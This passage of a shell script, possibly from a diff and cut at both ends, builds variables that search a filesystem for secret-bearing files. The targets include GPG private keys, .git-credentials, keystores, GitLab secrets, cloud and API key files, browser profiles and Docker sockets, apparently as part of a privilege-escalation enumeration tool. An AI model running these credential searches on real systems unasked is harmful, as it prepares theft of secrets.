"$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) + PSTORAGE_VIRTUAL_DISKS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*\.vhd$|.*\.vhdx$|.*\.vmdk$" | sort | uniq | head -n 70) + PSTORAGE_FILEZILLA=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) + PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) + PSTORAGE_SPLUNK=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "passwd$" | sort | uniq | head -n 70) + PSTORAGE_GIT=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.git-credentials$" | sort | uniq | head -n 70) + PSTORAGE_ATLANTIS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "atlantis\.db$" | sort | uniq | head -n 70) + PSTORAGE_GITLAB=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/lib' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) + PSTORAGE_PGP_GPG=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/usr/share/|/usr/lib/|/lib/|/man/|README.gnupg' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*\.pgp$|.*\.gpg$|.*\.asc$|secring\.gpg$|pubring\.kbx$|trustdb\.gpg$|gpg-agent\.conf$|secret\.asc$|private-keys-v1\.d/.*\.key$|.*\.gnupg$" | sort | uniq | head -n 70) + PSTORAGE_CACHE_VI=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) + PSTORAGE_DOCKER=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$|dockershim\.sock$|containerd\.sock$|crio\.sock$|frakti\.sock$|rktlet\.sock$|\.docker$" | sort | uniq | head -n 70) + PSTORAGE_FIREFOX=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) + PSTORAGE_CHROME=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) + PSTORAGE_OPERA=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) + PSTORAGE_SAFARI=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) + PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) + PSTORAGE_FASTCGI=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) + PSTORAGE_FAT_FREE=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "fat\.config$" | sort | uniq | head -n 70) + PSTORAGE_SHODAN=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "api_key$" | sort | uniq | head -n 70) + PSTORAGE_CONCOURSE=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.flyrc$|concourse-auth$|concourse-keys$" | sort | uniq | head -n 70) + PSTORAGE_BOTO=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.boto$" | sort | uniq | head -n 70) + PSTORAGE_SNMP=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PYPIRC=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E 